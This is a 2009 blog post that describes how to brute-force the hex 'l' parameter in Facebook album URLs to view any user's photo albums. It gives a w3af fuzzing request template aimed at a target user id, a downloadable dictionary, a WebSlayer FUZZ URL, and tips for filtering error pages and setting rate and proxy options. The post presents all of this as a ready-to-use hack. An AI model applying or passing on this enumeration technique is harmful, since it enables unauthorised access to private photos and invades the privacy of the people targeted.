Facebook Hack – Access Any Users Photo Albums
- March 12th, 2009
- By nukeit
- Write comment
Dave from Security Ninja shows how you can easily bruteforce a certain parameter to allow access to any user’s Facebook photo album using Burp Suite. Here are the basics:
Access to albums in Facebook is controlled by three parameters of a URL, you can see them here:
http://www.facebook.com/album.php?aid=-3&id=1508034566&l=aad9c
aid=-3 (-3 for every public profile album)
id=0123456789 (Obtained by searching for the user and hovering over the add friend button)
l=? (all we know is its 5 characters from the 0123456789abcdef range)
Dave uses Burp Suite, but there are many ways you can go about it. I think a dictionary of possible values might be marginally faster (untested) so I’ll use that.
First is one of my favorite methods, w3af’s Fuzzy Requests and Clustered Response tools.
GET http://www.facebook.com/album.php?aid=-3&id=targetsid&l=$[l.strip() for l in file('fbhex.dic').readlines()]$ HTTP/1.0
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-us) AppleWebKit/312.1 (KHTML, like Gecko) Safari/312
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Here’s the dictionary (1.1MB, zipped), extract it to your w3af directory.
After the run is finished, run the Cluster tool and wait. The valid page should show up far away from the rest of them.
Another tool that could be used for this is Edge Security’s WebSlayer:
URL:
http://www.facebook.com/album.php?aid=-3&id=targetsid&l=FUZZ
Set it to ignore lines so you can find your valid request faster. Currently, the error page contains 71 lines, but this may be different for you. Just run the scan for a few seconds and look at the number of lines that each error page contains, then stop the scan, enter the number in the ignore lines box and start again.
Other useful features of WebSlayer are the ability to control the rate and set proxy options.
There are likely MANY other tools that you can use to accomplish this task, but these seem to be the simplest.
Good luck, and remember:
Check out Dave’s post for the Burp Suite method he uses to generate the needed parameter.
